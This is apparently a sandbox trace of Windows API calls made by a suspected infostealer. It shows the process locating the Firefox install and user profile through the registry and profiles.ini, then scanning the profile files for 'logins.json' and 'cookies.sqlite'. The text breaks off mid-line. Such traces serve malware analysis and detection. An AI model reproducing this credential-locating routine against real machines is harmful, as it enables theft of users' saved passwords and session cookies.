returned 0x8e0000 [0161.107] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0161.107] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x1, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.107] RegCloseKey (hKey=0x148) returned 0x0 [0161.107] VirtualQuery (in: lpAddress=0x910b78, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x38000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b78 | out: hHeap=0x8e0000) returned 1 [0161.107] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x48000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0161.107] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x2, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0161.107] lstrlenW (lpString="Software\\Mozilla") returned 16 [0161.107] lstrlenW (lpString="\\") returned 1 [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903b78 [0161.107] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0161.107] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0161.107] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0161.107] lstrlenW (lpString="Mozilla Firefox 25.0") returned 20 [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4c) returned 0x90b458 [0161.107] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0161.107] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0161.107] VirtualQuery (in: lpAddress=0x903b78, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x45000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.107] GetProcessHeap () returned 0x8e0000 [0161.107] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903b78 | out: hHeap=0x8e0000) returned 1 [0161.107] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0", lpSrch="Firefox") returned="Firefox 25.0" [0161.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa58 | out: phkResult=0x2dfa58*=0x148) returned 0x0 [0161.108] RegQueryValueExW (in: hKey=0x148, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa5c, lpData=0x0, lpcbData=0x2dfa68*=0x0 | out: lpType=0x2dfa5c*=0x0, lpData=0x0, lpcbData=0x2dfa68*=0x0) returned 0x2 [0161.108] RegCloseKey (hKey=0x148) returned 0x0 [0161.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dfa30 | out: phkResult=0x2dfa30*=0x0) returned 0x2 [0161.108] GetProcessHeap () returned 0x8e0000 [0161.108] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b78 [0161.108] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x148) returned 0x0 [0161.108] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x0, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0161.108] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0161.108] lstrlenW (lpString="\\") returned 1 [0161.108] GetProcessHeap () returned 0x8e0000 [0161.108] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x4e) returned 0x90b400 [0161.108] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0") returned="Software\\Mozilla\\Mozilla Firefox 25.0" [0161.108] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0", lpString2="\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0161.108] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0161.108] lstrlenW (lpString="bin") returned 3 [0161.108] GetProcessHeap () returned 0x8e0000 [0161.108] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x54) returned 0x90a9f0 [0161.108] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Mozilla Firefox 25.0\\" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\" [0161.108] lstrcatW (in: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\", lpString2="bin" | out: lpString1="Software\\Mozilla\\Mozilla Firefox 25.0\\bin") returned="Software\\Mozilla\\Mozilla Firefox 25.0\\bin" [0161.108] VirtualQuery (in: lpAddress=0x90b400, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.108] GetProcessHeap () returned 0x8e0000 [0161.108] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b400 | out: hHeap=0x8e0000) returned 1 [0161.108] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", lpSrch="Firefox") returned="Firefox 25.0\\bin" [0161.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: phkResult=0x2dfa20*=0x14c) returned 0x0 [0161.108] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa24, lpData=0x0, lpcbData=0x2dfa30*=0x0 | out: lpType=0x2dfa24*=0x1, lpData=0x0, lpcbData=0x2dfa30*=0x66) returned 0x0 [0161.109] GetProcessHeap () returned 0x8e0000 [0161.109] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fcdb8 [0161.109] RegQueryValueExW (in: hKey=0x14c, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x8fcdb8, lpcbData=0x2dfa30*=0x66 | out: lpType=0x0, lpData=0x8fcdb8*=0x43, lpcbData=0x2dfa30*=0x66) returned 0x0 [0161.109] RegCloseKey (hKey=0x14c) returned 0x0 [0161.109] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0161.109] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0161.109] lstrlenW (lpString="") returned 0 [0161.109] GetProcessHeap () returned 0x8e0000 [0161.109] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x66) returned 0x911b98 [0161.109] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" [0161.109] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpString2="" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" [0161.109] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0161.109] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0161.109] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0161.109] GetProcessHeap () returned 0x8e0000 [0161.109] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c0 [0161.109] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0161.109] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0161.109] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0161.109] GetProcessHeap () returned 0x8e0000 [0161.109] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x90a830 [0161.109] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0161.109] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.109] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2dfa00, dwLength=0x1c | out: lpBuffer=0x2dfa00*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.109] GetProcessHeap () returned 0x8e0000 [0161.109] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.109] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0161.109] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0161.109] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.110] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.110] lstrlenW (lpString="") returned 0 [0161.129] GetProcessHeap () returned 0x8e0000 [0161.129] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926360 [0161.129] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.129] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.129] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.129] lstrlenW (lpString="profiles.ini") returned 12 [0161.129] GetProcessHeap () returned 0x8e0000 [0161.129] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x96) returned 0x9263e8 [0161.129] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.129] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0161.129] GetProcessHeap () returned 0x8e0000 [0161.129] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfdea) returned 0x912b80 [0161.129] GetProcessHeap () returned 0x8e0000 [0161.129] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x922978 [0161.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.129] CloseHandle (hObject=0x14c) returned 1 [0161.129] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x912b80, nSize=0xfde8, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0161.131] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0161.131] lstrlenW (lpString="General") returned 7 [0161.131] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0161.131] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x922978, nSize=0xfff, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/silmbjec.default") returned 0x19 [0161.132] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0161.132] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.132] lstrlenW (lpString="Profiles/silmbjec.default") returned 25 [0161.132] GetProcessHeap () returned 0x8e0000 [0161.132] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x926488 [0161.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.132] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles/silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles/silmbjec.default" [0161.132] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.132] lstrlenW (lpString="") returned 0 [0161.132] GetProcessHeap () returned 0x8e0000 [0161.132] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9252c0 [0161.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.133] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.133] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.133] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.133] lstrlenW (lpString="\\*.*") returned 4 [0161.133] GetProcessHeap () returned 0x8e0000 [0161.133] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925378 [0161.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.133] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*" [0161.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*", lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0161.133] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.133] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.133] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb76a6d10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0161.133] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.133] lstrlenW (lpString="\\") returned 1 [0161.133] GetProcessHeap () returned 0x8e0000 [0161.133] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.133] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.133] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.133] lstrlenW (lpString="addons.json") returned 11 [0161.133] GetProcessHeap () returned 0x8e0000 [0161.133] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924a48 [0161.133] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.133] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" [0161.133] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.133] GetProcessHeap () returned 0x8e0000 [0161.133] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.133] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="logins.json") returned 0x0 [0161.134] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="cookies.sqlite") returned 0x0 [0161.134] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.134] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0161.134] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0161.134] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.134] lstrlenW (lpString="\\") returned 1 [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.134] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.134] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.134] lstrlenW (lpString="bookmarkbackups") returned 15 [0161.134] GetProcessHeap () returned 0x8e0000 [0161.134] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 